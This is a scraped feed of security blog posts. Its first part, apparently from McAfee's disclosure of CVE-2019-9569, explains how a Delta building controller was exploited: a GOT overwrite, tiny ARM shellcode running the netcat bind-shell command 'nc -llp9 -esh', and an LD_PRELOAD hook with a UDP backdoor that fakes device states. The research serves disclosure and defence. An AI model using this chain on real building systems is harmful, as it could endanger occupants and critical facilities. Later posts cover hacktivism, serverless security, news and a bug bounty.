Knowing what to write where, we next considered any conditions which needed to be met for the correct code path to be taken to trigger the vulnerability. Taking another look at the code in memcpy that allows the buffer overflow to occur, we noticed that the overwrite does indeed have a condition, as shown in Figure 24.

Figure 24

The code producing the overwrite in memory is only taken if the value in R0, when bitwise ANDed with the immediate value 3, is not equal to 0. From our crash dump, we knew that the value in R0 is the address of the destination we want to copy to. This potentially posed a problem. If the address we wanted to write to was 4-byte aligned, which was highly likely, the code path for our vulnerability would not be taken. We could ensure that our code path was taken by subtracting one from the address we wish to write to in the GOT and then repairing the last byte of the previous entry. This ensures that the correct code path is taken and that we do not unintentionally damage a second function pointer.

Shellcode

While we discovered a place to put our shellcode, we only discovered a very small amount of space, specifically 32 bytes, in which to write the payload, shown in Figure 24. What can we accomplish in such a small amount of space? One method that does not require extensive shellcode is to use a “return to libc” attack to execute the system command. For our exploit to work out of the box, whatever command or program we run with system must be present on the device by default. Additionally, the command string itself needs to be quite short to accommodate the limited number of bytes we have to work with.

An ideal scenario would be executing code that would allow remote shell access to the device. Fortunately, Netcat is present on the device and this version of Netcat supports both the “-ll” flag, for persistent listening on a port for a connection, and the “-e” flag, for executing a command on connection. Thus, we could use system to execute Netcat to listen on some port and execute a shell when a connection is made. Before writing shell code to execute system with this command, we first tested various Netcat commands on the device directly to determine the shortest Netcat command that would still give us a shell. After a few iterations, we were able to shorten the Netcat command to 13 bytes:

nc -llp9 -esh

Since the instructions must be 4-byte-aligned and we have 32 bytes to work with, we are only concerned with the length of the string rounded up to the nearest multiple of 4, so in this case 16 bytes. Subtracting this from our total 32 bytes, we have 16 bytes left, or 4 instructions total, to set up the argument for system and jump to it. A common method to fit more instructions into a small space in memory on ARM is to switch to Thumb mode. This is because ARM’s Thumb mode utilizes 16-bit (2-byte) instructions, instead of the regular 32-bit (4-byte) ARM instructions. Unfortunately, the processor on this device did not support Thumb mode and therefore this was not an option.

The challenge to accomplishing our task in only 4 ARM instructions is the limit ARM places on immediate values. To jump to system, we needed to use an immediate value as the address to jump to, but memory address are not generally small values. Immediate values in ARM are limited to 12 bits; eight of these bits are for the value itself and the other 4 are used for bit shifting. This means that an immediate value can only be one byte long (two hex digits) but that byte can be zero padded in any fashion you like. Therefore, loading a full memory address of 4 bytes using immediate values would take all 4 instructions, whether using MOV or ADD. While we do have 4 instructions to play with, we also need at least one instruction to load the address of our command string into R0, the register used as the first parameter for system, and at least one instruction to branch to the address, requiring a total of 6 instructions.

One way to reduce the number of instructions needed is to start by copying a register already containing a value close to the address we want at the time the shellcode executes. Whether this is feasible depends on the value of the address we want to jump to compared to the addresses we have available in the registers right before our shell code is executed.

Starting with the address we need to call, we discovered three address we could jump to that would call system.

  1. 0x4006425C – the address of a BL system (branch to system) instruction in boot.so.
  2. 0x40054510 – the address of the system entry in “boot.so”’s GOT.
  3. 0x402874A4 – the direct address of system in libuClibc-0.9.30.so.

Next, we compared these options to the values in the registers at the time the shellcode is about to execute using GDB, shown in Figure 25.

Figure 25

Of the registers we have access to at the time our shell code executes, the one that gives us the smallest delta between its contents and one of these three addresses we can use to call system is R4. R4 contains 0x40235CB4, giving a delta of 0x517F0 when compared to the address for a direct call to system. The last nibble being 0 is ideal since that means we don’t have to account for the last bit, thanks to the rotation mechanism inherent to ARM immediate values. This means that we only need two immediate values to convert the contents of R4 into our desired address: one for 0x51000, the other for 0x7F0. Since we can apply an immediate offset when MOV’ing one register into another, we should be able to load a register with the address of system in only two instructions. With one instruction for performing the branch and 16 bytes for the command string, this means we can get all our shell code in 32 bytes, assuming we can load R0 with the address of our string in one instruction.

By starting our ASCII string for the command directly after the fourth and last instruction, we can copy PC into R0 with the appropriate offset to make it point to the string. An added benefit of this approach is that it makes the string’s address independent of where the shell code is placed into memory, since it’s relative to PC. Figure 26 shows what the shellcode looks like with consideration for all restrictions.

Figure 26

It is important to note that the “.asciz” assembler directive is used to place a null-terminated ASCII string literal into memory. R12 was chosen as the register to contain the address of branch, since R12 is the Intra Procedural (IP) scratch space register on the ARM architecture. This means R12 is often used as a general-purpose register within subroutines indicating it is almost certainly safe to clobber for our purposes without experiencing unexpected adverse effects.

Piecing Everything Together

With a firm understanding of the vulnerability, exploit, and the shellcode needed we could now attempt exploitation. Looking at the sequence of packets used to cause this attack, it is not a single packet attack, but a multiple packet attack. The initial buffer overflow is contained in the large malformed packet, so what data do we build into it? This packet is overwriting memory but not providing control over execution; therefore, this can be considered the “setup” or “staging” packet. This is where memcpy will look for the address of the destination buffer for our last packet. The address we want to overwrite goes in this packet followed by our shellcode. As explained above, the address we are looking to overwrite is the address of the scDecodeBACnetUDP function pointer in the GOT minus one, to ensure the address isn’t 4-byte aligned. By repairing the last byte of the previous function pointer and overwriting this address, we can gain execution control.

The large malformed packet contains “where” we want to “write” to and puts our shellcode into memory yet does not contain “what” we want to write. The “what”, in this case, is the address of our shellcode, so our last packet needs to contain this address. The final challenge is deciding where in the last packet the address belongs.

Recall from the core dump shown previously that the crash happens on memcpy attempting to write the value 0x81 to the bad address. 0x81 is the first byte of the BVLC layer, indicating this where our address needs to go within the last packet to ensure that only the address we want is overwritten. We also need to ensure there are not any bytes after our address, otherwise we will continue to overwrite the GOT past our target address. Since this application is a multi-threaded application, this could cause the application to crash before our shellcode has a chance to execute. Since the BVLC layer is typically how a packet is identified as a BACnet packet, a potential problem with altering this layer is that the last packet will no longer look like a BACnet packet. If this is the case, will the application still ingest the packet? The team tested this and discovered that the application will ingest any broadcast packet regardless of type, since the vulnerable code is executed before the code that validates the packet type.

Taking everything into account and sending the series of 97 packets, we were able to successfully exploit the building manager by creating a bind shell. Below is a video demonstrating this attack:

A Real-world Scenario

Although providing a root shell to an attacker proves the vulnerability is exploitable, what can an attacker do with it? A shell by itself does not prove useful unless an attacker can control the normal operation of the system or steal valuable data. In this case, there is not a lot of useful data stored on the device. Someone could download information about how the system is configured or what it’s controlling, which may have some value, but this will not hold significant impact on its own. It is also plausible to delete essential system files via a denial-of-service attack that could easily put the target in an unusable state, but pure destruction is also of low value for various reasons. First, as mentioned previously, the device has a backup image that it will fall back to if a failure occurs during the boot process. Without physical access to the device, an attacker wouldn’t have a clear idea of how the backup image differs from the original or even if it is exploitable. If the backup image uses a different version of the firmware, the exploit may no longer work. Perhaps more importantly, a denial-of-service attack suffers from its inherent lack of subtlety. If the attack immediately causes alarms to go off when executed, the attacker can expect that their persistence in the system will be short-lived.

What if the system could be controlled by an attacker while being undetected?  This scenario becomes more concerning considering the type of environments controlled by this device.

Normal Programming

Controlling the standard functions of the device from just a root shell requires a much deeper understanding of how the device works in a normal setting. Typically, the Delta eBMGR is programmed by an installer to perform a specific set of tasks. These tasks can range from managing access control, to building lighting, to HVAC, and more. Once programmed, the controller is connected to several external input/output (I/O) modules. These modules are utilized for both controlling the state of an attached device and relaying information back to the manager. To replicate these “normal conditions”, we had a professional installer program our device with a sample program and attach the appropriate modules.

Figure 27 shows how each component is connected in our sample programming.  For our initial testing, we did not actually have the large items such as the pump, boiler and heating valve. The state of these items can be tracked through either LEDs on the modules or the touchscreen interface, hence it was unnecessary for us to acquire them for testing purposes. Despite this, it is still important to note which type of input or output each “device”, virtual or otherwise, is connected to on the modules.

Figure 27

The programming to control these devices is surprisingly simple. Essentially, based on the inputs, an output is rendered. Figure 28 shows the programming logic present on the device during our testing.

Figure 28

There are three user-defined software variables: “Heating System”, “Room Temp Spt”, and “Heating System Enable Spt”.  Here, “spt” indicates a set point. These can be defined by an operator at run time and help determine when an output should be turned on or off. The “Heating System” binary variable simply controls the on/off state of the system.

Controlling the Device

Like when we first started looking for vulnerabilities, we want to ensure our method of controlling the device is not dependent on code which could vary from controller to controller. Therefore, we want to find a method that allows us to control all the I/O devices attached to a Delta eBMGR, ensuring we are not dependent on this device’s specific programming.

As on any Linux-based system, the installer-defined programming at its lowest level utilizes system calls, or functions, to control the attached hardware. By finding a way to manipulate these functions, we would therefore have a universal method of controlling the modules regardless of the installer programming.  A very common way of gaining this type of control when you have root access to a system is through the use of function hooking. The first challenge for this approach is simply determining which function to hook. In our case, this required an extensive amount of reverse engineering and debugging of the system while it was running normally. To help reduce the scope of functions we needed to investigate, we began by focusing our attention on controlling binary output (BO). Our first challenge was how to find the code that handles changing the state of a binary output.

A couple of key factors helped point us in the right direction. First, the documentation for the controller indicates the devices talk to the I/O modules over a Controller Area Network Bus (CAN bus), which is common for PLC devices.  As previously seen, the Delta binaries all have symbols included.  Thus, we can use the function names provided in the binaries to help reduce the code surface we need to look at – IDA tells us there are only 28 functions with “canio” as the first part of their name. Second, we can assume that since changing the state of a BO requires a call to physical hardware, a Linux system call is needed to make that change. Since the device is making a change to an IO device, it is highly likely that the Linux system call used is “ioctl”. When cross-referencing the functions that start with “canio” and that call “ioctl”, our prior search space of 28 drops to 14. One function name stood out above the rest: “canioWriteOutput”. The decompiled version of the function has been reproduced in Figure 29.

Figure 29

Using this hypothesis, we set a break point on the call to “ioctl” inside canioWriteOutput and use the touchscreen to change the state of one of the binary outputs from “off” to “on”. Our breakpoint was hit! Single stepping over the breakpoint, we were able to see the correct LED light up, indicating the output was now on.

Now knowing the function we needed to hook, the question quickly became: How do we hook it? There are several methods to accomplish this task, but one of the simplest and most stable is to write a library that the main binary will load into memory during its startup process, using an environment variable called LD_PRELOAD. If a path or multiple paths to shared objects or libraries are set in LD_PRELOAD before executing a program, that program will load those libraries into its memory space before any other shared libraries. This is significant, because when Linux resolves a function call, it looks for function names in the order in which the libraries are loaded into memory. Therefore, if a function in the main Delta binary shares a name and signature with one defined in an attacker-generated library that is loaded first, the attacker-defined function will be executed in its place. As the attacker has a root shell on the device, it is possible for them to modify the init scripts to populate the LD_PRELOAD variable with a path to an attacker-generated library before starting the Delta software upon boot, essentially installing malware that executes upon reboot.

Using the cross-compile toolchain created in the early stages of the project, it was simple to test this theory with the “library” shown in Figure 30.

Figure 30

The code above doesn’t do anything meaningful, but it does confirm if hooking this method will work as expected.  We first defined a function pointer using the same function prototype we saw in IDA for canioWriteOutput.  When canioWriteOutput is called, our function will be called first, creating an output file in the “opt” directory and giving us a place to write text, proving that our hook is working. Then, we search the symbol table for the original “canioWriteObject” and call it with the same parameters passed into our hook, essentially creating a passthrough function. The success of this test confirmed this method would work.

For our function hook to do more than just act as a passthrough, we needed to understand what parameters were being passed to the function and how they affect execution. By using GDB, we could examine the data passed in during both the “on” and “off” states. For canioWriteObject, it was discovered that the state of binary output was encoded into the second parameter passed to the function. From there, we could theoretically control the state of the binary output by simply passing the desired state as the second parameter to the real function, leaving the other parameters as-is. In practice, however, the state change produced using this method persisted only for a split second before the device reset the output back to its proper state.

Why was the device returning the output to the correct state? Is there some type of protection in place? Investigating strings in the main Delta binary and the filesystem on the device led us to discover that the device software maintains databases on the filesystem, likely to preserve device and state information across reboots. At least one of these databases is used to store the state of binary outputs along with, presumably, other kinds of I/O devices. With further investigation using GDB, we discovered that the device is continuously polling this database for the state of any binary outputs and then calling canioWriteOutput to publish the state obtained from the database, clobbering whatever state was there before. Similarly, changes to this state made by a user via the touchscreen are stored in this same database. At first, it may appear that the simplest solution would be to change the database value since we have root access to the device. However, the database is not in a known standard format, meaning we would need to take the time to reverse this format and understand how the data is stored. As we already have a way to hook the functions, controlling the outputs at the time canioWriteOutput is called is simpler.

To accomplish this, we updated our malware to keep track of whether the attacker has made a modification to the output or not. If they have, the hook function replaces the correct state, stored in canioWriteOutput’s second parameter, with the state asserted by the attacker before calling the real canioWriteOutput function. Otherwise, the hook function acts as a simple passthrough for the real deal. A positive side effect of this, from the attacker’s perspective, is the touchscreen will show the output as the state the user last requested even after the malware has modified it. Implementing this simple state-tracking resolved our prior issue of the attacker-asserted state not persisting.

With control of the binary output, we moved on to looking at each of the other types of inputs and outputs that can be connected to the modules. We used a similar approach in identifying the methods used to read or write data from the modules and then hooking them. Unfortunately, not every function was as simple as canioWriteOutput. For example, when reversing the functions used to control analog outputs, we noticed that they utilized custom data structures to hold various information about the analog device, including its state. As a result, we had to first reverse the layout of these data structures to understand how the analog information was being sent to the outputs before we could modify their state. By using a combination of static and dynamic analysis, we were able to create a comprehensive malicious library to control the state of any device connected to the manager.

Taking our Malware to the Next Level

Although making changes from a root shell certainly proves that an attacker can control the device once it has been exploited, it is more practical and realistic for the attacker to have complete remote control not contingent on an active shell. Since we were already loading a library on startup to manipulate the I/O modules, we decided it would also be feasible to use that same library to create a command-and-control type infrastructure. This would allow an attacker to just send commands remotely to the “malware” without having to maintain a constant connection or shell access.

To bring this concept to life, we needed to create a backdoor and an initialization function was probably the best place to put one. After some digging, we found “canioInit”, a function responsible for initializing the CAN bus. Since the CAN bus is required to make any modifications to the operation of the device, it made sense to wait for this function to be called before starting our backdoor. Unlike some of the previous hooks mentioned, we don’t make any changes to this call or its return data; we only use it as a method to ensure our backdoor is started at the proper time.

Figure 31

When canioInit is called, we first spawn a new thread and then execute the real canioInit function.  Our new thread opens a socket on UDP port 1337 and listens for very specific commands, such as “bo0 on” to indicate to “turn on binary output 0” or “reset” to put the device back in the user’s control. Based on the commands provided, the “set_io_state” method called by this thread activates the necessary hooking methods to control the I/O as described in the previous section.

Figure 32

With a fully functioning backdoor in the memory space of the Delta software, we had full control of the device with a realistic attack chain. Figure 33 outlines the entire attack.

Figure 33

The entire process above, from sending out the malicious packets to gaining remote control, takes under three minutes, with the longest task being the reboot. Once the attacker has established control, they can operate the device without impacting what information the user is provided, allowing the attacker to stay undetected and granting them ample opportunity to cause serious damage, depending on what kind of hardware the Delta controller manages.

Real World Impact

What is the impact of an attack like this? These controllers are installed in multiple industries around the world. Via Shodan, we have observed nearly 600 internet-accessible controllers running vulnerable versions of the firmware.  We tracked eBMGR devices from February 2019 to April 2019 and found that there were a significant number of new devices available with public IP addresses.

As of early April 2019, 492 eBMGR devices remained reachable via internet-wide scans using Shodan. Of those found, a portion are almost certainly honeypots based on user-applied tags found in the Shodan data, leaving 404 potentially vulnerable victims. If we include other Delta Controls devices using the same firmware and assume a high likelihood they are vulnerable to the same exploit, the total number of potential targets balloons to over 1600. We tracked 119 new internet connected eBMGR devices since February 2019; however, these were outpaced by the 216 devices that have subsequently gone offline. We believe this is a combination of standard practice for ICS systems administrators to connect these devices to the Internet, coupled with a strategy by the vendor (Delta Controls) proactively reaching out to customers to reduce the internet-connected footprint of the vulnerable devices. Most controllers appear to be in North America with the US accountable for 53% of online devices and Canada accounting for 35%. It is worth noting the fact that in some cases the IP address, and hence the geographic location of the device from Shodan, is traced back to an ISP (Internet Service Provider), which could result in skewed findings for locations.

Some industries seem more at risk than others given the accessibility of devices. We were only able to map a small portion of these devices to specific industries, but the top three categories we found were Education, Telecommunications, and Real Estate. Education included everything from elementary schools to universities. In academic settings, the devices were sometimes deployed district-wide, in numerous facilities across multiple campuses. One example is a public-school system in Canada where each school building in the district had an accessible device.  Telecommunications was comprised entirely of ISPs and/or phone companies. Many of these could be due to the ISPs being listed as a service provider. The real estate category generally included office and apartment buildings. From available metadata in the search results, we also managed to find instances of education, healthcare, government, food, hospitality, real estate, child care and financial institutions using the vulnerable product.

With a bit more digging, we were easily able to find other targets through publicly available information. While it is not common practice to post sensitive documents online, we’ve found many documents available that indicate that these devices are used as part of the company’s building automation plans. This was particularly true for government buildings where solicitations for proposals are issued to build the required infrastructure. All-in-all we have collected around 20 documents that include detailed proposals, requirements, pricing, engineering diagrams, and other information useful for reconnaissance. One particular government building had a 48-page manual that included internal network settings of the devices, control diagrams, and even device locations.

Redacted network diagram found on the Internet specifying ICS buildout

What does it matter if an attacker can turn on and off someone’s AC or heat?  Consider some of the industries we found that could be impacted. Industries such as hospitals, government, and telecommunication may have severe consequences when these systems malfunction. For example, the eBMGR is used to maintain positive/negative pressure rooms in medical facilities or hospitals, where the slightest change in pressurization could have a life-threating impact due to the spread of airborne diseases.  Suppose instead a datacenter was targeted. Datacenters need to be kept at a cool temperature to ensure they do not overheat. If an attacker were to gain access to the vulnerable controller and use it to raise heat to critical levels and disable alarms, the result could be physical damage to the server hardware in mass, as well as downtime costs, not to mention potential permanent loss of critical data.  According to the Ponemon Institute (https://www.ponemon.org/library/2016-cost-of-data-center-outages), the average cost of a datacenter outage was as high as $740,357 in 2016 and climbing. Microsoft was a prime example of this; in 2018, the company suffered a massive datacenter outage (https://devblogs.microsoft.com/devopsservice/?p=17485) due to a cooling failure, which impacted services for around 22 hours.

To show the impact beyond LED lights flashing, McAfee’s ATR contracted a local Delta installer to build a small datacenter simulation with a working Delta system. This includes both heating and cooling elements to show the impact of an attack in a true HVAC system. In this demonstration we show both normal functionality of the target system, as well as the full attack chain, end-to-end, by raising the temperature to dangerous levels, disabling critical alarms and even faking the controller into thinking it is operating normally. The video below shows how this simple unpatched vulnerability could have devastating impact on real systems.

We also leverage this demo system, now located in our Hillsboro research lab, to highlight how an effective patch, in this case provided by Delta Controls, is used to immediately mitigate the vulnerability, which is ultimately our end goal of this research project.

Conclusion

Discoveries such as CVE-2019-9569 underline the importance of secure coding practices on all devices. ICS devices such as this Delta building manager control critical systems which have the potential to cause harm to businesses and people if not properly secured.

There are some best practices and recommendations related to the security of products falling into nonstandard environments such as industrial controls. Based on the nature of the devices, they may not have the same visibility and process control as standard infrastructure such as web servers, endpoints and networking equipment. As a result, industrial control hardware like the eBMGR PLC may be overlooked from various angles including network or Internet exposure, vulnerability assessment and patch management, asset inventory, and even access controls or configuration reviews. For example, a principle of least privilege policy may be appropriate, and a network isolation or protected network segment may help provide boundaries of access to adversaries. An awareness of security research and an appropriate patching strategy can minimize exposure time for known vulnerabilities. We recommend a thorough review and validation of each of these important security tenants to bring these critical assets under the same scrutiny as other infrastructure.

One goal of the McAfee Advanced Threat Research team is to identify and illuminate a broad spectrum of threats in today’s complex and constantly evolving landscape. As per McAfee’s vulnerability public disclosure policy, McAfee’s ATR informed and worked directly with the Delta Controls team.  This partnership resulted in the vendor releasing a firmware update which effectively mitigates the vulnerability detailed in this blog, ultimately providing Delta Controls’ consumers with a way to protect themselves from this attack. We strongly recommend any businesses using the vulnerable firmware version (571848 or prior) update as soon as possible in line with your patch policy and testing strategy. Of special importance are those systems which are Internet-facing. McAfee customers are protected via the following signature, released on August 6th: McAfee Network Security Platform 0x45d43f00 BACNET: Delta enteliBUS Manager (eBMGR) Remote Code Execution Vulnerability.

We’d like to take a minute to recognize the outstanding efforts from the Delta Controls team, which should serve as a poster-child for vendor/researcher relationships and the ability to navigate the unique challenges of responsible disclosure.  We are thrilled to be collaborating with Delta, who have embraced the power of security research and public disclosure for both their products as well as the common good of the industry. Please refer to the following statement from Delta Controls which provides insight into the collaboration with McAfee and the power of responsible disclosure.

The post HVACking: Understanding the Delta Between Security and Reality appeared first on McAfee Blogs.

Live From Black Hat USA: Making Big Things Better the Dead Cow Way

When Reuters’ investigative reporter Joseph Menn confirmed that presidential candidate Beto O’Rourke was an early member of The Cult of the Dead Cow (cDc), it seemed as though folks had two viewpoints on it. They either had more respect for him because they understood what cDc was trying to accomplish, or they were relatively horrified because “hackers are bad.” It’s easy to fear what we don’t understand, and what is often shed in a bad light.

In InfoSec, we know and understand that hackers are not inherently bad. Many of them are hactivists looking to make positive change in the world. During the Black Hat panel discussion, “Making Big Things Better the Dead Cow Way,” Menn talked about how O’Rourke was 14 or 15 years old when he joined the cDc and left before the organization grew in notoriety, and that he interviewed a neo-Nazi in Texas and proceeded to let him hang himself with his own words. Even at that young age, he was all about diversity and engagement, especially within the cDc.

Mudge Zatko, a prominent member of L0pht and the cDc, who went on to be a program manager at DARPA, shared what he thought stood out most about O’Rourke, saying, “You can form groups online, but when you get together and meet the person, are they who you thought? You met [Beto] and he was a very friendly guy.”

This story matters because in order to make change, you have to understand where your power and influence lie to have the best results. For O’Rourke, that looks like running for president. For the cDc, it was acknowledging that hackers have power and influence. With the understanding that computers and encryption could be leveraged to help human rights efforts, the group made a more public move toward hactivism.

“What can you do to make the world a better place? How do we leverage this power? Use that to go through the media, and hopefully through some sort of technology, but especially through our connections to the media and use the influence of our long history,” said Mudge.

While Veracode co-founder Christien Rioux, or Dildog, opted to work with the private sector to tackle issues of security at a wide-scale by creating the technology that would become static binary analysis and Veracode, there are many who opt to take more of a hactivist approach. As with anything else, there are varying views on what hactivism is and what it isn’t – which parallels with debates about what human rights truly encompasses.

“What is your definition of human rights? Just governmental interaction because of civil liberties, or is it applicable to private organizations,” asks Luke Benfey (aka Deth Veggie). “Some believe it is and some believe it isn't. There are philosophical disagreements about what is ethically valid. Some believe that DDOS or web defacement is not applicable as legitimate means of protest, and others believe it is a legitimate means of protest. These are things that are still going on, and I don't necessarily think that the kinds of hactivism have changed radically, so much as scale has changed; the Internet and access to it has spread much more widely around the world.”

With broader access comes broader awareness and even broader responsibility: once something is seen it can’t be unseen. While we certainly see malicious cyberattacks making headlines, a lot of good is being done by the hacktivist community as well. Just look to discussions around coordinated disclosure and the ways in which security researchers are working with private and public organizations to make them – and all of us – safer.

If you’re looking for something to do, and want real proof of the cDc’s hacktivist ethos, we were told that if you search the former Yugoslavia website for cDc in the case files pertaining to former Yugoslav president Slobodan Milosevic’s trial for war crimes, you’ll see that they pop up a lot for their work helping prosecutors.

Or you could just watch this video Q&A where Veracode Co-Founder Chris Wysopal (@WeldPond) interviews Menn, Rioux, and Deth Veggie about the cDc and Menn’s book, “Cult of the Dead Cow: How the Original Hacking Supergroup Might Just Save the World” at this year’s Black Hat.

Serverless Security: Best Practices to Secure your Serverless Infrastructure

According to a study by LogicMonitor, the number of applications hosted on-premises will decrease by 10%, to 27%, by 2020. In comparison, the number of cloud-native, more specifically serverless hosted applications, like AWS Lambda, Google Cloud and Microsoft Azure, will increase to 41%.

The trend to cloud, specifically serverless, and away from on-prem, is not new and of no surprise, as serverless hosted applications provide developers with a faster speed to market and allows for them to release new functionality on a more frequent basis. In addition, it can save organizations bundles in infrastructure costs. It has however left DevSecOps and security teams in a quandary. While they don’t want to impede development efforts, they are left with no choice but to place the security of serverless applications in someone else’s hands.

To alleviate this issue, there are several serverless security best practices that must be put in place in order to properly secure serverless apps launched by the developer.

Serverless Security Best Practices

Don’t rely solely on WAF protection: Application layer firewalls are only capable of inspecting HTTP(s) traffic. This means that a WAF will only protect functions which are API Gateway-triggered functions. It will not provide protection against any other event trigger types. A WAF will not help if your functions are triggered from different events sources, such as:

  • Cloud storage events (e.g. AWS S3, Azure Blob storage, Google Cloud Storage)
  • Stream data processing (e.g. AWS Kinesis)
  • Databases changes (e.g. AWS DynamoDB, Azure CosmosDB)
  • Code modifications (e.g. AWS CodeCommit)
  • Notifications (e.g., SMS, Emails, IoT)

Having a WAF in place is still important, but it is not and should not be the only line of defense in securing serverless applications. Relying solely on a WAF leaves many gaping security holes.

Customize Function Permissions: 90% of permissions in serverless applications are found to be over permissioned. While setting up permissions feels like a daunting task when thinking of the function levels in serverless, a one size fits all approach is not a solution. Setting policies that are larger and more permissive in the function is a common serverless security mistake, and failing to minimize individual function roles and permissions makes your attack surface larger than necessary. Creating proper function level permissions requires DevSecOps teams to sit down with the developers who wrote the functions and review what each function does. Only after determining what each function actually needs to do, can a unique role for each function and a suitable permission policy be created. Luckily there are tools available to help automate this process for heightened AWS Lambda security, as well as other cloud-native platforms.

Conduct a Code Audit: Black Duck Software conducted an audit of 1,000 commonly-used applications in enterprises and found that 96% utilized open-source software. Furthermore, their researchers found that 60% of that software contained security vulnerabilities, and some of the bugs were more than four years old. This makes code ownership and authenticity a critical security risk, as can you really trust what isn’t yours?

Referred to as “Poisoning the Well,’ attackers aim to gain more long-term persistence in your application by means of an upstream attack. Cloud-native applications tend to comprise of many modules and libraries. The modules often include many other modules, so it’s not uncommon for a single serverless function to include tens of thousands of lines of code from various external sources, even with less than 100 lines of code your developers wrote. Attackers look to include their malicious code in common projects. After poisoning the well, they patiently wait as the new version makes its way into your cloud applications. To enhance AWS serverless security, as well as Microsoft Azure, Google Cloud Functions, etc, it is important to conduct a security audit of the code or look for tooling that can automate the process, scanning for vulnerabilities as a serverless security best practice.

Retain Control Over Your Functions: This may sound like a utopian dream, but code vulnerability can be mitigated through careful CI/CD. Malicious functions can slip in through a variety of means, such as being deployed by a rogue employee. Additionally, develop workstations could be a target for attackers, rather than the deployed apps themselves, and would enable attackers to deploy malicious functions through legitimate channels. Such functions could sneak in and wreak havoc, undetected. To offset this chance, create a policy and strategy for conducting a code analysis during build before it goes into runtime, and make sure every function goes through CI/CD.

Look at All Attack Indicators: Visibility gets harder with serverless. The shift to serverless significantly increases the total amount of information and the number of resources, which hinders DevSecOps and Security team’s ability to make sense of all the data. As the quantity of functions increases, it becomes even more difficult to determine if everything is behaving the way it’s supposed to. Case in point, only a few hundred functions can generate billions of events in your log every day and it becomes difficult to know which are important. Even if you are familiar with the attack patterns that are unique to serverless apps, visually scanning them all simply can’t be done, so leverage AI tools for added serverless security visibility and efficiency.

Time Out Your Functions: Functions should have a tight runtime profile. Admittedly, crafting appropriate serverless function timeouts is often not intuitive. The maximum duration of a function can be quite specific to that function. DevSecOps teams must consider the configured timeout versus the actual timeout. Many developers set the timeout to the maximum allowed since the unused time doesn’t create an additional expense. However, this approach creates an enormous security risk because if an attacker is able to succeed with a code injection, they have more time available to do more damage. Shorter timeouts require them to attack more often, which we refer to as a “Groundhog Day,” attack, but it makes the attack more visible. As a serverless security best practice, shrink not just what a function can do, but how long it can run.

In conclusion, despite new security challenges arising, serverless deployments are great for organizations of all sizes- providing developers with speed to launch, and improving operational costs and efficiencies. Serverless also creates an opportunity to adopt an even greater security posture since everything is at the function level making it even more difficult for attackers. To embrace this new opportunity, it is important for teams to change their approach to application security in serverless deployments. Securing serverless apps requires a variety of tools and tactics, including collaboration between the people involved in the application and the security.

The post Serverless Security: Best Practices to Secure your Serverless Infrastructure appeared first on CyberDB.

Cyber Security Roundup for July 2019

July was a month of mega data privacy fines. The UK Information Commissioners Office (ICO) announced it intended to fine British Airways £183 million for last September's data breach, where half a million BA customer personal records were compromised. The ICO also announced a £100 million fine for US-based Marriot Hotels after the Hotel chain said 339 million guest personal data records had been compromised by hackers. Those fines were dwarfed on the other side of the pond, with Facebook agreeing to pay a US Federal Trade Commission (FTC) fine of $5 billion dollars, to put the Cambridge Analytica privacy scandal to bed. And Equifax paid $700 million to FTC to settle their 2017 data breach, which involved the loss of at least 147 million personal records. Big numbers indeed, we are seeing the big stick of the GDPR kicking in within the UK, and the FTC flexing some serious privacy rights protection punishment muscles in the US. All 'food for thought' when performing cybersecurity risk assessments.

Through a Freedom of Information request, the UK Financial Conduct Authority (FCA) disclosure a sharp rise of over 1000% in cyber-incidents within UK financial sector in 2018. In my view, this rise was fueled by the mandatory data breach reporting requirement of the GDPR, given it came into force in May 2018. I also think the finance sector was reluctant to report security weakness pre-GDPR, over fears of damaging their customer trust. Would you trust and use a bank if you knew its customers were regularly hit by fraud?

Eurofins Scientific, the UK's largest forensic services provider, which was taken down by a mass ransomware attack last month, paid the cybercrooks ransom according to the BBC News. It wasn't disclosed how much Eurofins paid, but it is highly concerning when large ransoms are paid, as it fuels further ransomware attacks.

A man was arrested on suspicion of carrying out a cyberattack against Lancaster University. The UK National Crime Agency said university had been compromised and "a very small number" of student records, phone numbers and ID documents were accessed. In contrast, the FBI arrested a 33 old software engineer from Seattle, she is alleged to have taken advantage of a misconfigured web application firewall to steal a massive 106 million personal records from Capital One. A stark reminder of the danger of misconfiguring and mismanaging IT security components.

The Huawei international political rhetoric and bun fighting has gone into retreat. UK MPs said there were no technological grounds for a complete Huawei banwhile Huawei said they were 'confident' the UK will choose to include it within 5G infrastructure. Even the White House said it would start to relax the United States Huawei ban. It seems something behind the scenes has changed, this reversal in direction is more likely to be financially motivated than security motivated in my rather cynical view.

A typical busy month for security patch releases, Microsoft, Adobe and Cisco all releasing the expected barrage of security updates for their products. There was security updates released by Apple as well, however, Google researchers announced six iPhone vulnerabilities, including one that remains unpatched.

BLOG
NEWS
VULNERABILITIES AND SECURITY UPDATES
HUAWEI NEWS AND THREAT INTELLIGENCE

Awarding Google Cloud Vulnerability Research



Today, we’re excited to announce a yearly Google Cloud Platform (GCP) VRP Prize to promote security research of GCP. A prize of $100,000.00 will be paid to the reporter of the best vulnerability affecting GCP reported through our Vulnerability Reward Program (g.co/vulnz) and having a public write-up (nominations will be received here).

We’ve received vulnerability reports for various application security flaws in GCP over the years, but we felt research of our Cloud platform has been under-represented in our Vulnerability Reward Program. So, with the GCP VRP Prize, we hope to encourage even more researchers to focus on GCP products and help us identify even more security vulnerabilities.

Note that we will continue to pay hundreds of thousands of dollars to our top bug hunters through our Vulnerability Research Grants Program even when no bugs are found, and to reward up to tens of thousands of dollars per bug to the most impactful findings. This prize is meant to create an additional incentive for more people to focus on public, open security research on GCP who would otherwise not participate in the reward program.

This competition draws on our previous contests, such as Pwnium and the Project Zero Prize, and rather than focusing bug hunters on collecting vulnerabilities for complex bug chains, we are attempting a slightly different twist and selecting a single winner out of all vulnerabilities we receive. That said, this approach comes with its own challenges, such as: defining the right incentives for bug hunters (both in terms of research as well as their communications with our team when reporting vulnerabilities); or ensuring there are no conflicting incentives, either when our own team is looking for similar vulnerabilities (since we aren't eligible for collecting the prize).

For the rest of the year, we will be seeking feedback from our top bug hunters and the security community to help define what vulnerabilities are the most significant, and we hope we can work together to find the best way to incentivize, recognize, and reward open security research. To further incentivize research in 2019, we will be issuing GCP VRP grants summing up to $100,000 to our top 2018 researchers.

Head over here for the full details on the contest. Note that if you have budget constraints for access to testing environments, you can use the free tier of GCP.

We look forward to our Vulnerability Rewards Programs resulting in even more GCP customer protection in the following years thanks to the hard work of the security research community. Follow us on @GoogleVRP.

Finding Evil in Windows 10 Compressed Memory, Part Three: Automating Undocumented Structure Extraction

